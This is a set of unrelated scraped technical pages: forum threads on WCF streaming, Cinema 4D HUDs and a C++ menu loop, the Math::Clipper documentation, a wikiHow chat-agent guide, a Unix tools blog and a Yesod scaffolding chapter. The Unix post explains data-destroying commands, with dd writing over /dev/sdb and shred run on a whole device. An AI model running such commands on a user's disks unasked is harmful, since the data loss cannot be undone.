So I've narrowed down the issue, but am unsure why it's happening. I slightly altered your last project to contain a set of basic string values. If you include the strings on line 179 of dbrowstream it fails after 30 rows; if you exclude them it works beautifully. You can have a look at the code I altered here: skydrive.live.com/redir.aspx Any help would be greatly appreciated.

It looks like something to do with the string length. If I replace line #179 with the code below, it works:

    model.AMP = new string('a', 40);

And if I replace the line with this code, it also works:

    model.AMP = stringCache[i - 1];
    if (model.AMP.Length != 40)
    {
        model.AMP += new string(' ', 40 - model.AMP.Length);
    }

Let me do some more research and get back to you.

It's the memory stream. I implemented a basic thread-safe memory stream found on CodeProject, here: …/PipeStream-a-Memory-Efficient-and-Thread-Safe-Stre and the issues went away. I'm going to do some additional research into thread-safe memory streams because this implementation is much slower than a straight memory stream, but that seems to be the issue. If you have any suggestions on other stream types that might do the trick, let me know. Regards, Ryan

Ran this utility, and with the existing code in it, the host service could process the records seamlessly if they are limited to 10-20 thousand.
Tried a 0.1 million record scenario and the service ran out of memory. Any suggestions for handling this scenario? Regards, Sanjay

Really helpful article. We tried the given utility and found an issue with processing a huge number of records, in our case around half a million. For a few thousand this utility works fine. Any suggestions for handling huge record counts? Regards, Sanjay
https://blogs.msdn.microsoft.com/webapps/2012/09/06/custom-wcf-streaming/
Math::Clipper - Polygon clipping in 2D

    use Math::Clipper ':all';

    my $clipper = Math::Clipper->new;

    $clipper->add_subject_polygon( [ [-100, 100], [ 0, -200], [100, 100] ] );
    $clipper->add_clip_polygon(    [ [-100, -100], [100, -100], [ 0, 200] ] );
    my $result = $clipper->execute(CT_DIFFERENCE);
    # $result is now a reference to an array of three triangles

    $clipper->clear();
    # all data from previous operation cleared
    # object ready for reuse

    # Example with floating point coordinates:
    # Clipper requires integer input.
    # These polygons won't work.
    my $poly_1 = [ [-0.001, 0.001], [0, -0.002], [0.001, 0.001] ];
    my $poly_2 = [ [-0.001, -0.001], [0.001, -0.001], [0, 0.002] ];

    # But we can have them automatically scaled up (in place)
    # to a safe integer range
    my $scale = integerize_coordinate_sets( $poly_1, $poly_2 );

    $clipper->add_subject_polygon( $poly_1 );
    $clipper->add_clip_polygon( $poly_2 );
    my $result = $clipper->execute(CT_DIFFERENCE);

    # to convert the results (in place) back to the original scale:
    unscale_coordinate_sets( $scale, $result );

    # Example using 32 bit integer math instead of the default 53 or 64
    # (less precision, a bit faster)
    my $clipper32 = Math::Clipper->new;
    my $scale32 = integerize_coordinate_sets( { bits => 32 }, $poly_1, $poly_2 );
    $clipper32->add_subject_polygon( $poly_1 );
    $clipper32->add_clip_polygon( $poly_2 );
    my $result32 = $clipper32->execute(CT_DIFFERENCE);
    unscale_coordinate_sets( $scale32, $result32 );

Clipper is a C++ (and Delphi) library that implements polygon clipping. The module optionally exports a few constants to your namespace. Standard Exporter semantics apply (including the :all tag).
The list of exportable constants comprises the clip operation types (which should be self-explanatory):

    CT_INTERSECTION
    CT_UNION
    CT_DIFFERENCE
    CT_XOR

Additionally, there are constants that set the polygon fill type during the clipping operation:

    PFT_EVENODD
    PFT_NONZERO
    PFT_POSITIVE
    PFT_NEGATIVE

INTEGERS: Clipper 4.x works with polygons with integer coordinates. Data in floating point format will need to be scaled appropriately to be converted to the available integer range before polygons are added to a clipper object. (Scaling utilities are provided here.)

A Polygon is represented by a reference to an array of 2D points. A Point is, in turn, represented by a reference to an array containing two numbers: the X and Y coordinates. A 1x1 square polygon example:

    [ [0, 0], [1, 0], [1, 1], [0, 1] ]

Sets of polygons, as returned by the execute method, are represented by an array reference containing 0 or more polygons.

Clipper also has a polygon type that explicitly associates an outer polygon with any additional polygons that describe "holes" in the filled region of the outer polygon. This is called an ExPolygon. The data structure for an ExPolygon is as follows:

    {
        outer => [ <polygon> ],
        holes => [
            [ <polygon> ],
            [ <polygon> ],
            ...
        ]
    }

The "fill type" of a polygon refers to the strategy used to determine which side of a polygon is the inside, and whether a polygon represents a filled region or a hole. You may optionally specify the fill type of your subject and clip polygons when you call the execute method.

When you specify the NONZERO fill type, the winding order of polygon points determines whether a polygon is filled, or represents a hole. Clipper uses the convention that counter clockwise wound polygons are filled, while clockwise wound polygons represent holes. This strategy is more explicit, but requires that you manage winding order of all polygons.
The EVENODD fill type strategy uses a test segment, with its start point inside a polygon, and its end point out beyond the bounding box of all polygons in question. All intersections between the segment and all polygons are calculated. If the intersection count is odd, the inner-most (if nested) polygon containing the segment's start point is considered to be filled. When the intersection count is even, that polygon is considered to be a hole. For an example case in which NONZERO and EVENODD produce different results, see the "NONZERO vs. EVENODD" section below.

new: Constructor that takes no arguments and returns a new Math::Clipper object.

add_subject_polygon: Adds a(nother) polygon to the set of polygons that will be clipped.

add_clip_polygon: Adds a(nother) polygon to the set of polygons that define the clipping operation.

add_subject_polygons: Works the same as add_subject_polygon, but adds a whole set of polygons.

add_clip_polygons: Works the same as add_clip_polygon, but adds a whole set of polygons.

execute: Performs the actual clipping operation. Returns the result as a reference to an array of polygons.

    my $result = $clipper->execute( CT_UNION );

Parameters: the type of the clipping operation, defined by one of the constants (CT_*). Additionally, you may define the polygon fill types (PFT_*) of the subject and clipping polygons as second and third parameters respectively. By default, even-odd filling (PFT_EVENODD) will be used.

    my $result = $clipper->execute( CT_UNION, PFT_EVENODD, PFT_EVENODD );

Like execute, a variant performs the actual clipping operation but returns a reference to an array of ExPolygons (see "CONVENTIONS").

clear: For reuse of a Math::Clipper object, you can call the clear method to remove all polygons and internal data from previous clipping operations.

integerize_coordinate_sets: Takes an array of polygons and scales all point coordinates so that the values will fit in the integer range available. Returns an array reference containing the scaling factors used for each coordinate column. The polygon data will be scaled in-place.
The scaling vector is returned so you can "unscale" the data when you're done, using unscale_coordinate_sets.

    my $scale_vector = integerize_coordinate_sets( $poly1, $poly2, $poly3 );

The main purpose of this function is to convert floating point coordinate data to integers. As of Clipper version 4, only integer coordinate data is allowed. This helps make the intersection algorithm robust, but it's a bit inconvenient if your data is in floating point format. This utility function is meant to make it easy to convert your data to Clipper-friendly integers, while retaining as much precision as possible. When you're done with your clipping operations, you can use the unscale_coordinate_sets function to scale results back to your original scale.

Convert all your polygons at once, with one call to integerize_coordinate_sets, before loading the polygons into your clipper object. The scaling factors need to be calculated so that all polygons involved fit in the available integer space. By default, the scaling is uniform between coordinate columns (e.g., the X values are scaled by the same factor as the Y values) making all the scaling factors returned the same. In other words, by default, the aspect ratio between X and Y is constrained.

Options may be passed in an anonymous hash, as the first argument, to override defaults. If the first argument is not a hash reference, it is taken instead as the first polygon to be scaled.

    my $scale_vector = integerize_coordinate_sets(
        {
            constrain => 0, # don't do uniform scaling
            bits      => 32 # use the +/-1,073,741,822 integer range
        },
        $poly1, $poly2, $poly3
    );

The bits option can be 32, 53, or 64. The default will be 53 or 64, depending on whether your Perl uses 64 bit integers AND long doubles by default. (The scaling involves math with native doubles, so it's not enough to just have 64 bit integers.) Setting the bits option to 32 may provide a modest speed boost, by allowing Clipper to avoid calculations with large integer types.
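The uniform (aspect-ratio-constrained) scaling described above can be sketched in a few lines of Python. This is an illustration only, not the Math::Clipper implementation; the function names and the target range of 2**52 are arbitrary choices made for this sketch.

```python
def integerize(coord_sets, max_coord=2 ** 52):
    """Scale every coordinate in every set (in place) by one shared
    factor, chosen so the largest magnitude lands at max_coord,
    then round to integers. Returns the scale used."""
    biggest = max(abs(v) for poly in coord_sets for point in poly for v in point)
    scale = max_coord / biggest
    for poly in coord_sets:
        for i, (x, y) in enumerate(poly):
            poly[i] = (round(x * scale), round(y * scale))
    return scale

def unscale(scale, coord_sets):
    """Undo the scaling in place, converting results back to the
    original coordinate range."""
    for poly in coord_sets:
        for i, (x, y) in enumerate(poly):
            poly[i] = (x / scale, y / scale)

poly = [(-0.001, 0.001), (0.0, -0.002), (0.001, 0.001)]
scale = integerize([poly])
# every coordinate is now an integer, safe for integer-only clipping
unscale(scale, [poly])
# ...and is now back to (approximately) its original floating point value
```

Because one factor is shared between X and Y, the aspect ratio of the data is preserved, which mirrors the default constrain behaviour.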
The constrain option is a boolean; the default is true. When set to false, each column of coordinates (X, Y) will be scaled independently. This may be useful when the domain of the X values is very much larger or smaller than the domain of the Y values, to get better resolution for the smaller domain. The different scaling factors will be available in the returned scaling vector (array reference).

This utility will also operate on coordinates with three or more dimensions. Though the context here is 2D, be aware of this if you happen to feed it 3D data. Large domains in the higher dimensions could squeeze the 2D data to nothing if scaling is uniform.

unscale_coordinate_sets: This undoes the scaling done by integerize_coordinate_sets. Use this on the polygons returned by the execute method. Pass the scaling vector returned by integerize_coordinate_sets, and the polygons to "unscale". The polygon coordinates will be updated in place.

    unscale_coordinate_sets($scale, $clipper_result);

offset:

    my $offset_polygons = offset($polygons, $distance);
    my $offset_polygons = offset($polygons, $distance, $scale, $jointype, $miterlimit);

Takes a reference to an array of polygons ($polygons), a positive or negative offset dimension ($distance), and, optionally, a scaling factor ($scale), a join type ($jointype) and a numeric angle limit for the JT_MITER join type.

The polygons will use the NONZERO fill strategy, so filled areas and holes can be specified by polygon winding order. A positive offset dimension makes filled polygons grow outward, and their holes shrink. A negative offset makes polygons shrink and their holes grow.

Coordinates will be multiplied by the scaling factor before the offset operation and the results divided by the scaling factor. The default scaling factor is 100. Setting the scaling factor higher will result in more points and smoother contours in the offset results.

Returns a new set of polygons, offset by the given dimension.
    my $offset_polygons = offset($polygons, 5.5); # offset by 5.5

or

    my $offset_polygons = offset($polygons, 5.5, 1000); # smoother results, proliferation of points

WARNING: As you increase the scaling factor, the number of points grows quickly, and will happily consume all of your RAM. Large offset dimensions also contribute to a proliferation of points.

Floating point data in the input is acceptable - in that case, the scaling factor also determines how many decimal digits you'll get in the results. It is not necessary, and generally not desirable, to use integerize_coordinate_sets to prepare data for this function.

When doing negative offsets, you may find the winding order of the results to be the opposite of what you expect, although this seems to be fixed in recent Clipper versions. Check the order and change it if it is important in your application.

Join type can be one of JT_MITER, JT_ROUND or JT_SQUARE.

area: Returns the signed area of a single polygon. A counter clockwise wound polygon area will be positive; a clockwise wound polygon area will be negative. Coordinate data should be integers.

    $area = area($polygon);

orientation: Determine the winding order of a polygon. It returns a true value if the polygon is counter-clockwise and you're assuming a display where the Y-axis coordinates are positive upward, or if the polygon is clockwise and you're assuming a positive-downward Y-axis. Coordinate data should be integers.

The majority of 2D graphic display libraries have their origin (0,0) at the top left corner, thus Y increases downward; however some libraries (Quartz, OpenGL) as well as non-display applications (CNC) assume Y increases upward.

    my $poly = [ [0, 0], [2, 0], [1, 1] ]; # a counter clockwise wound polygon (assuming Y upward)
    my $direction = orientation($poly);
    # now $direction == 1

This function was previously named is_counter_clockwise().
This symbol is still exported for backwards compatibility; however, you're encouraged to switch to orientation(), as the underlying Clipper library switched to it to clarify the Y-axis convention issue.

simplify_polygon / simplify_polygons: These functions convert self-intersecting polygons (known as complex polygons) to simple polygons. simplify_polygon() takes a single polygon as its first argument, while simplify_polygons() takes multiple polygons in a single arrayref. The second argument must be a polyfilltype constant (PFT_*, see above). Both return an arrayref of polygons.

Clipper accepts 64 bit integer input, but limits the domain of input coordinate values to +/-4,611,686,018,427,387,902, to allow enough overhead for certain calculations. Coordinate values up to these limits are possible with Perls built to support 64 bit integers. A typical Perl that supports 32 bit integers can alternatively store 53 bit integers as floating point numbers; in this case, the coordinate domain is limited to +/-9,007,199,254,740,992. When optionally constraining coordinate values to 32 bit integers, the domain is +/-1,073,741,822. The integerize_coordinate_sets utility function automatically respects whichever limit applies to your Perl build.

NONZERO vs. EVENODD

Consider the following example:

    my $p1 = [ [0,0], [200000,0], [200000,200000] ];             # CCW
    my $p2 = [ [0,200000], [0,0], [200000,200000] ];             # CCW
    my $p3 = [ [0,0], [200000,0], [200000,200000], [0,200000] ]; # CCW

    my $clipper = Math::Clipper->new;
    $clipper->add_subject_polygon($p1);
    $clipper->add_clip_polygons([$p2, $p3]);
    my $result = $clipper->execute(CT_UNION, PFT_EVENODD, PFT_EVENODD);

$p3 is a square, and $p1 and $p2 are triangles covering two halves of the $p3 area. The CT_UNION operation will produce different results depending on whether PFT_EVENODD or PFT_NONZERO is used. These are the two different strategies used by Clipper to identify filled vs. empty regions.

Let's see the thing in detail: $p2 and $p3 are the clip polygons. $p2 overlaps half of $p3.
With the PFT_EVENODD fill strategy, the number of polygons that overlap in a given area determines whether that area is a hole or a filled region. If an odd number of polygons overlap there, it's a filled region; if an even number, it's a hole/empty region. So with PFT_EVENODD, winding order doesn't matter. What matters is where areas overlap.

So, using PFT_EVENODD, and considering $p2 and $p3 as the set of clipping polygons, the fact that $p2 overlaps half of $p3 means that the region where they overlap is empty. In effect, in this example, the set of clipping polygons ends up defining the same shape as the subject polygon $p1. So the union is just the union of two identical polygons, and the result is a triangle equivalent to $p1.

If, instead, the PFT_NONZERO strategy is specified, the set of clipping polygons is understood as two filled polygons, because of the winding order. The area where they overlap is considered filled, because there is at least one filled polygon in that area. The set of clipping polygons in this case is equivalent to the square $p3, and the result of the CT_UNION operation is also equivalent to the square $p3.

This is a good example of how PFT_NONZERO is more explicit, and perhaps more intuitive.

This module was built around, and includes, Clipper version 5.0.3. See the SourceForge project page of Clipper for more information.

The Perl module was written by Steffen Mueller (<smueller@cpan.org>), Mike Sheldrake and Alessandro Ranellucci (aar/alexrj), but the underlying Clipper library was written by Angus Johnson. Check the SourceForge project page for contact information.

Math::Clipper ships a copy of the Clipper C++ library and is available under the same license as Clipper itself: the Boost Software License.
http://search.cpan.org/~aar/Math-Clipper-1.17/lib/Math/Clipper.pm
Hi guys, as you may know, C4D doesn't allow adding a watermark post-effect (project name, time code, ...) to the OpenGL render engine. I'm trying to do this in Python, but no luck! I've tried to add text objects that print the required attributes and attach them to the camera, but when adding a DOF effect in Enhanced OpenGL mode the text objects disappear because they are simply out of focus. I've also tried to add a custom HUD, but unfortunately HUDs don't render in the OpenGL renderer either. Recently I discovered that the RealFlow for C4D plugin adds a special HUD that shows the particle count, fluid name, ... and it renders in OpenGL! How could I add such a HUD in Python? If this is complicated, could I exclude an object from being affected by the DOF effect in Python? Your help is much appreciated.

Hi @ashambe, you can render a HUD in OpenGL. It's true that the Options tab is not displayed if the render engine is set to OpenGL, but if you defined it in Standard (or even have the option container selected) and then switch to OpenGL, you can still access the Render HUD option. With that said, you can have a Python script that draws HUD text. Here is an example:

    import c4d
    # Welcome to the world of Python

    def draw(bd):
        values = []

        # All text to display
        txtList = [doc.GetActiveRenderData().GetName(),
                   doc.GetDocumentName(),
                   doc.GetFirstObject().GetName()]

        # Adds an entry for each text line
        position = bd.GetSafeFrame()
        for x in xrange(len(txtList)):
            pos = c4d.Vector(position["cl"] + 2, 20 + 25 * x, 0)
            tmpDict = {"_txt": txtList[x], "_position": pos}
            values.append(tmpDict)

        # Sets the matrix to screen space
        bd.SetMatrix_Screen()

        # Enables depth buffer
        bd.SetDepth(True)

        # Draws the HUD text entries
        bd.DrawMultipleHUDText(values)
        return True

    def main():
        pass  # put in your code here

And the attached scene with the code and the settings already enabled: renderHud.c4d

Cheers, Maxime.

@m_adam Thanks, gonna try them both, much appreciated.

@m_adam I've tried the custom Python script that draws HUD text, but I'm stuck on the same original problem: the DOF effect is affecting the new HUDs, which are blurred out. I've tried to change the value of bd.SetDepth to False, but no luck.

@ashambe May I ask which version and OS (with version) you are on? Using the next code is working nicely in R21.1:

    # Disables depth buffer
    bd.SetDepth(False)

    # Draws the HUD text entries
    bd.DrawMultipleHUDText(values)

    # Enables depth buffer
    bd.SetDepth(True)

Hey @m_adam, I'm using R20 on Windows 10. Thanks a lot.

Hi @ashambe, may I ask for your code? Because here I'm not able to reproduce it with bd.SetDepth(False) in Win 10 R20.

@m_adam Hi, I'm testing the same code you've provided! Yes, the code I provided didn't work, but with it worked.

Can you share a scene, please? What's your exact version (including subversion, not only R20 but R20.XX) of Windows/Driver/Cinema 4D? Since I can't reproduce, without more information I can't help you.

@m_adam Ah OK great, will test it and get back to you. Thanks, sir.
https://plugincafe.maxon.net/topic/12034/hud-on-opengl-previews/10
wikiHow to Add an Automated Live Chat to an ASP.NET Website

If you're a .NET developer, this wiki will help you add an automated live chat agent to your ASP.NET website for free, using a developer-friendly class library from NuGet.org. Many of the automated agents online use only a keyword-based pattern recognition system and are very susceptible to making weird responses. A true automated live chat agent should always be backed by an architecture that facilitates complex pattern recognition and the generation of human-like responses. This tutorial uses SIML (Synthetic Intelligence Markup Language) as the markup language for writing your agent's knowledge base. It's important to note that this wiki is designed for developers working with ASP websites that target .NET Framework 4.5 and above.

Steps

1. Import the SynChat library from NuGet. In your ASP website project click Tools -> NuGet Package Manager -> Package Manager Console and type Install-Package SynChat. This will import the SynChat class library from NuGet along with its dependency library.

2. Add a new Web Form to your project. Right click your project and click Add -> New Item.. and select Web Form. Name this new web form "ChatService.aspx". Now double click the file and remove all the lines of code except the first line.

3. Right click the above file and select View Code and add the following. Replace the string with your website address.
    using System;
    using Syn.Automation.Chat;

    namespace Automated_Live_Chat_Demo
    {
        public partial class ChatService : System.Web.UI.Page
        {
            private static readonly ChatAgent Agent;

            static ChatService()
            {
                Agent = new ChatAgent
                {
                    ServiceUrl = "",
                    ResourceUrl = "",
                    Name = "Maya",
                    Title = "Syn Web Assistant",
                    Intro = "Hi I am Maya, I am here to answer your questions.",
                    InputText = "What can I help you with?",
                    Footer = "Syn",
                    FooterLink = "",
                    RestartId = "restart",
                    PackageFileName = "Package.txt"
                };
            }

            protected void Page_Load(object sender, EventArgs e)
            {
                Agent.Process(Request, Response);
            }
        }
    }

4.

5. Create a knowledge base for your virtual agent. Google "Syn Chatbot Studio" and download the program. Select File -> New -> Project and fill in the details required. Make sure you select Syn Web Assistant as the project template. For more details on working with SIML, google "Synthetic Intelligence Markup Language" and check the Quick Start tutorial on the official website.

6. Export the knowledge base to an SIML package, but change the extension. By default Syn Chatbot Studio will save the file with the extension .simlpk, which stands for SIML Package; however, if this file is to be referenced from a URL its MIME type should be accessible, so change the extension to .txt as shown in the image above.

7. Add the created package file to the Assistant folder. Right click the Assistant folder and select Add -> Existing Item.. and select the Package.txt file.

8. Add a simple JavaScript to display the virtual chat agent on your website. To do so, paste the following code just above the </form> tag element in your master page's HTML code and change with your website address.
    <script type="text/javascript">
        (function () {
            var scriptElement = document.createElement('script');
            scriptElement.type = 'text/javascript';
            scriptElement.async = true;
            scriptElement.src = '';
            (document.getElementsByTagName('head')[0] ||
             document.getElementsByTagName('body')[0]).appendChild(scriptElement);
        })();
    </script>

9. Run your website project and check if the virtual chat agent's window is visible.

10. Chat with the virtual agent and check if you are presented with the desired responses.

Tips

- You can download SIML files from GitHub. These files are open source in nature and are licensed under Apache License version 2.0.
- You can replace the avatar with your own custom avatar, but make sure that you use the .png file format if you wish to have a transparent background, and use the exact resolution used by the avatar images in the demo project.
- You can map the .simlpk extension in IIS to text/plain if you do not wish to rename the file extension to .txt every time you upload your SIML package to the Assistant folder.
- If you add an updated SIML package to the Assistant folder, use the URL to restart the chat agent with its new knowledge base.

Sources and Citations

- GitHub Repository – research source
- NuGet Package – research source
- SIML Quick Start – research source
http://www.wikihow.com/Add-an-Automated-Live-Chat-to-an-ASP.NET-Website
Unix Operating System tools

dd

dd(1) stands for disk duplicator, though it is often humourously called disk destroyer, since misuse can mean total loss of a disk's data. It is an old tool. It pre-dates the convention of starting options with a -, so the command to make a backup of an attached disk is:

    $ dd if=/dev/sdb of=disk-backup.img

if=/dev/sdb specifies that the input file is /dev/sdb, which is the second disk attached to the computer. of=disk-backup.img says that the contents of the disk should be written to disk-backup.img.

Another use of dd(1) is creating large files. if=/dev/urandom lets you create a file with random contents; if=/dev/zero lets you create a file filled with zeros. Just substituting the if= in the previous command would result in a command that will fill your filesystem. To limit the amount of data copied, specify bs= and count=. bs= specifies the buffer size, which is how much data to read before starting to write. count= specifies how many full buffers to copy, so the amount of data to copy is the product of the two. With that in mind, the following command makes a 512 MiB file full of random data, in blocks of 1 KiB.

    $ dd if=/dev/urandom of=random-file bs=1024 count=524288

The following will create a file full of zeroes.

    $ dd if=/dev/zero of=random-file bs=1024 count=524288

dd(1) also supports the seek= option, which can be used to start writing data at a given offset into the file. This could be useful for writing to a partition elsewhere on the disk, or creating a sparse file. This command writes the disk image, skipping the first block of the disk.

    $ dd if=disk.img of=/dev/sdb seek=1

This command creates a 1 GiB sparse file on file-systems that support it.

    $ dd if=/dev/zero bs=1 of=sparse-file \
        seek=$(( (1024 * 1024 * 1024) - 1 )) count=1

The intent of truncate -s 1GiB sparse-file is clearer.

shred

dd is only affectionately known as Data Destroyer; shred(1), unlike it, is actually supposed to destroy data.
This writes random data in-place to attempt to replace the file contents on disk, so its data cannot be recovered. Unfortunately, file-systems are no longer so simple that this works. Journalled file-systems like ext4 may have a copy in the journal, and CoW file-systems like btrfs may keep multiple copies around. Partly this is the result of an evolutionary arms race by file-systems against storage devices, doing their very best not to lose data. For this reason, I would recommend using shred(1) on the device you believe the file-system to be backed by, or, if you're feeling particularly paranoid, remove the drive from the machine and physically shred it into as many pieces as you feel comfortable with.

sync

There are various layers of caching involved when writing data to a hard-disk, to provide better throughput. If you're using the C standard API, fflush(3) is the first thing you need to call. This will write any data that is being buffered by the C library to the VFS layer. This just guarantees that any reads or writes performed by talking to your operating system will see that version of the data; it will be cached in memory until a convenient time when it can be written out again. It has not yet made it onto the disk; to ensure this, you need to call one of the sync system calls. These give as good a guarantee as you can get that, if you were to suddenly lose power, your data would be on the disk. It is not possible to directly sync the writes associated with a file descriptor from shell, but you can use the sync(1) command, which will do its best with every disk. Of course, none of this can actually guarantee that your data is safely written to the disk: the drive may lie about the writes having made it to disk and cache them for better throughput, and unless it can guarantee, with some form of internal power supply, that it will finish writes before losing power, your data may be lost.
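The layering described above can be walked through from Python as well. This small sketch (mine, not from the original article) flushes each caching layer in turn, ending with the fsync call that asks the kernel to push the data toward the device:

```python
import os

def durable_write(path, data):
    """Write `data` to `path`, flushing each caching layer in turn."""
    with open(path, "wb") as f:
        f.write(data)         # 1. into the file object's userspace buffer
        f.flush()             # 2. userspace buffer -> kernel page cache (like fflush(3))
        os.fsync(f.fileno())  # 3. ask the kernel to push the page cache to the device

durable_write("example.txt", b"important data")
```

Even after the fsync returns, the caveat from the text still applies: the drive itself may have cached the write, so this is the strongest guarantee software alone can give, not an absolute one.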
uname

uname(1) is an old interface for telling you more about your operating system. Common uses are uname -r to say which version you are using, and uname -m to say which machine you are running on; uname -a does its best to show you everything. For example, since I use a debian chroot on an Android tablet, I get the following:

    $ uname -a
    Linux localhost 3.1.10-gea45494 #1 SMP PREEMPT Wed May 22 20:26:32 EST 2013 armv7l GNU/Linux

mknod and mkfifo

mknod(1) and mkfifo(1) create special files. /dev/null is one such file. mkfifo(1) is a special case of mknod(1), creating a device node with well-known properties, while mknod(1) is capable of creating arbitrary device nodes, which may be backed by any physical or virtual device provided by the kernel. Because of this it is a privileged operation, as you could otherwise bypass the permissions imposed on the devices in /dev. Modern Linux systems use a special file-system called devtmpfs to provide device nodes, rather than requiring people to use mknod(1) to populate /dev.

mkfifo(1) is useful for shell scripts though, when there are complicated control flows that can't be easily expressed with a pipeline. The following script will pipe ls through cat, and tell you the exit status of both commands, without having to rely on bash's PIPESTATUS array.

    td="$(mktemp -d)"
    mkfifo "$td/named-pipe"

    ls >"$td/named-pipe" & # start ls in background, writing to pipe
    lspid="$!"

    cat <"$td/named-pipe" & # read contents from pipe
    # you may start getting ls output to your terminal now
    catpid="$!"

    wait "$lspid"
    echo ls exited "$?"
    wait "$catpid"
    echo cat exited "$?"

    rm -rf "$td"

df and du

df(1) displays the amount of space used by all your file systems. It can be given a path, at which point it will try to give you an appropriate value for what it thinks is the file system mounted there. Modern Linux systems can have very complicated file systems though, so it may not always give correct results.
df(1), for example, can give incorrect results for btrfs, where there's not a 1-to-1 mapping between disks and file-system usage, and it is not smart about things like bind-mounts and mount namespaces, so smarter tools like findmnt(1) from util-linux are required.

du(1) attempts to inform you of how much disk space is used for a specific file-system tree, so du -s . tells you how much space your current directory is using. du -s / is unlikely to correspond with the number provided by df /, because there are metadata overheads, so on normal file-systems the result of df(1) is likely to be larger. btrfs can also produce different results, since it can share data between files.

chroot

chroot(1) is a useful command for allowing programs with different userland requirements to work on the same computer, assuming you don't need too much security. It changes a process' view of the file-system to start at a different point, so you can hypothetically use it to restrict access to certain resources. There are various ways of escaping a chroot, so it's insufficient to protect your system from untrusted programs. Containers or virtual machines are more secure, but don't have a standard interface. Chroots are still useful for trusted programs though. For example, I run debian squeeze on my Android tablet to do my blogging.

nice

nice(1) can be used to hint to your operating system's scheduler that a process requires more or fewer resources. This can't be used to prevent a misbehaving process from consuming more than its fair share of CPU, since it could always fork further worker processes. Linux attempts to handle this deficiency with cgroups.
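To make the du comparison above concrete, here is a sketch (mine, not from the article) of the apparent-size total that du approximates. Real du counts allocated blocks rather than apparent sizes, which is one reason sparse files and CoW sharing make the numbers diverge.

```python
import os

def tree_size(path):
    """Sum the sizes of all regular files under `path`, roughly what
    `du -s` reports (as apparent size); symlinks are skipped rather
    than followed, so a link cannot pull in files outside the tree."""
    total = 0
    for dirpath, _dirnames, filenames in os.walk(path):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):
                total += os.path.getsize(full)
    return total

current_dir_bytes = tree_size(".")
```

Comparing this total for / against df / shows the metadata overhead the text mentions: df accounts for the whole file-system, including space the files themselves never see.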
https://yakking.branchable.com/posts/careful-now/
ok so why doesn't this work. i mean i can go into the different sections but when i'm back at main i can't go into, lets say, new game again. ok. i know i'm a super noob but i'm eager to learn. thx a bunch.

Code:

    #include <iostream>
    using namespace std;

    int main()
    {
        int x;
        while (x != 3)
        {
            cout << "**MAIN MENU**\n\n";
            cout << "1.New game\n2.Options\n3.Exit\n";
            cout << "Choice:";
            cin >> x;
            cout << "\n";

            /*NEW GAME*/
            if (x == 1)
            {
                int y;
                while (y != 2)
                {
                    cout << "*New game*\n\n";
                    cout << "1.Map\n2.Back\n";
                    cout << "Choice:";
                    cin >> y;
                    cout << "\n";
                }
            }

            /*OPTIONS*/
            if (x == 2)
            {
                int z;
                while (z != 2)
                {
                    cout << "*Options*\n\n";
                    cout << "1.Difficulty\n2.Back\n";
                    cout << "Choice:";
                    cin >> z;
                    cout << "\n";
                }
            }
        }
    }
http://cboard.cprogramming.com/cplusplus-programming/100787-while-question.html
Scaffolding and the Site Template

December 9, 2011, by Michael Snoyman

So you're tired of running small examples, and ready to write a real site? Then you're at the right chapter. Even with the entire Yesod library at your fingertips, there are still a lot of steps you need to go through to get a production-quality site set up:

- Config file parsing
- Signal handling (*nix)
- More efficient static file serving
- A good file layout

The scaffolded site is a combination of many Yesoders' best practices combined into a ready-to-use skeleton for your sites. It is highly recommended for all sites. This chapter will explain the overall structure of the scaffolding, how to use it, and some of its less-than-obvious features.

How to Scaffold

The yesod package installs both a library and an executable (conveniently named yesod as well). This executable provides a few commands (run yesod by itself to get a list). In order to generate a scaffolding, the command is yesod init. This will start a question-and-answer process where you get to provide basic details (your name, the project name, etc). After answering the questions, you will have a site template in a subfolder with the name of your project.

The most important of these questions is the database backend. You get four choices here: SQLite, PostgreSQL, MongoDB, and tiny. tiny is not a database backend; instead, it specifies that you do not want to use any database. This option also turns off a few extra dependencies, giving you a leaner overall site. The remainder of this chapter will focus on the scaffoldings for one of the database backends. There will be minor differences for the tiny backend.

After creating your files, the scaffolder will print a message about getting started. It gives two sets of options for commands: one using cabal, and the other using cabal-dev. cabal-dev is basically a wrapper around cabal which causes all dependencies to be built in a sandbox.
Using it is a good way to ensure that installing other packages will not break your site setup. It is strongly recommended. If you don't have cabal-dev, you can install it by running cabal install cabal-dev.

Note that you really do need to use the cabal install (or cabal-dev install) command. Most likely, you do not yet have all the dependencies in place needed by your site. For example, none of the database backends, nor the Javascript minifier (hjsmin), are installed when installing the yesod package.

Finally, to launch your development site, you would use yesod devel (or yesod --dev devel). This site will automatically reload whenever you change your code.

File Structure

The scaffolded site is built as a fully cabalized Haskell package. In addition to source files, config files, templates, and static files are produced as well.

Cabal file

Whether directly using cabal, or indirectly using yesod devel, building your code will always go through the cabal file. If you open the file, you'll see that there are both library and executable blocks. Only one of these is built at a time, depending on the value of the library-only flag. If library-only is turned on, then the library is built, which is how yesod devel calls your app. Otherwise, the executable is built.

The library-only flag should only be used by yesod devel; you should never be explicitly passing it into cabal. There is an additional flag, dev, that allows cabal to build an executable, but turns on some of the same features as the library-only flag, i.e., no optimizations and reload versions of the Shakespearean template functions.

In general, you will build as follows:

- When developing, use yesod devel exclusively.
- When building a production build, perform cabal clean && cabal configure && cabal build. This will produce an optimized executable in your dist folder.

You'll also notice that we specify all language extensions in the cabal file.
The extensions are specified twice: once for the executable, and once for the library. If you add any extensions to the list, add them to both places.

You might be surprised to see the NoImplicitPrelude extension. We turn this on since the site includes its own module, Import, with a few changes to the Prelude that make working with Yesod a little more convenient.

The last thing to note is the exported-modules list. If you add any modules to your application, you must update this list to get yesod devel to work correctly. Unfortunately, neither Cabal nor GHC will give you a warning if you forget to make this update; instead, you'll get a very scary-looking error message from yesod devel.

Routes and entities

Multiple times in this book, you've seen a comment like "We're declaring our routes/entities with quasiquotes for convenience. In a production site, you should use an external file." The scaffolding uses such external files. Routes are defined in config/routes, and entities in config/models. They have the exact same syntax as the quasiquoting you've seen throughout the book, and yesod devel knows to automatically recompile the appropriate modules when these files change.

The models file is referenced by Model.hs. You are free to declare whatever you like in this file, but here are some guidelines:

- Any data types used in entities must be imported/declared in Model.hs, above the persistFile call.
- Helper utilities should either be declared in Import.hs or, if very model-centric, in a file within the Model folder and imported into Import.hs.

Foundation and Application modules

The mkYesod function which we have used throughout the book declares a few things:

- Route type
- Route render function
- Dispatch function

The dispatch function refers to all of the handler functions, and therefore all of those must either be defined in the same file as the dispatch function, or be imported by the dispatch function.
